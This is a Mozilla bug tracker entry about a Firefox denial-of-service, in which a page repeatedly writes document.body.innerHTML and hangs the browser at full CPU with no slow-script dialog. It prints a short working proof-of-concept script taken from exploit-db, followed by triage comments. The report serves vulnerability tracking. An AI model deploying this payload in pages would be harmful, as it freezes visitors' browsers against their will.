Open Bug 612029 Opened 14 years ago Updated 2 years ago

document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)

Categories

(Firefox :: General, defect)

x86
Windows XP
defect

Tracking


Tracking Status
blocking2.0 --- -
status1.9.2 --- wanted
status1.9.1 --- wanted

People

(Reporter: pusat_6807, Unassigned)

References

(Depends on 1 open bug)

Details

(Keywords: hang, Whiteboard: [sg:dos])

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}
 
for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
 
</script>

Reproducible: Always

Steps to Reproduce:
1. DDoS attack
2.
3.
Actual Results:  
Expected Results:  
blocking1.9.1: --- → ?
blocking1.9.2: --- → ?
blocking2.0: --- → ?
This was published 2010-11-12 at http://www.exploit-db.com/exploits/15498/
I don't see any crash using Fx 3.6.12 on WinXP, just a 100% CPU hang.
Keywords: hang
We probably didn't need 5 copies of the code in-line...

Since it's public at exploit-db there's no point in keeping the bug hidden, we'll just get dupes.
Group: core-security
Summary: ddos Atack Crashed → dos Atack Crashed (exploit-db 15498)
Whiteboard: [sg:dos]
blocking1.9.1: ? → ---
blocking1.9.2: ? → ---
Summary: dos Atack Crashed (exploit-db 15498) → dos Attack Crashed (exploit-db 15498)
Is 4.0 afflicted?
Summary: dos Attack Crashed (exploit-db 15498) → dos Attack (hang with 100% CPU) (exploit-db 15498)
(In reply to comment #6)
> Is 4.0 afflicted?

Yes, in the same way as 3.6.12: 100% CPU, no crash, no "slow script" dialog.
Tested on Linux, WinXP and OSX.  On Linux, the OOM killer kills the process
after ~10 seconds.
We should at least figure out if we can make the slow-script dialog show up.
Status: UNCONFIRMED → NEW
Ever confirmed: true
blocking2.0: ? → -
Depends on: 641105
Summary: dos Attack (hang with 100% CPU) (exploit-db 15498) → document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)
Severity: normal → S3

The severity field for this bug is relatively low, S3. However, the bug has 10 duplicates.
:mossop, could you consider increasing the bug severity?

For more information, please visit auto_nag documentation.

Flags: needinfo?(dtownsend)

The last needinfo from me was triggered in error by recent activity on the bug. I'm clearing the needinfo since this is a very old bug and I don't know if it's still relevant.

Flags: needinfo?(dtownsend)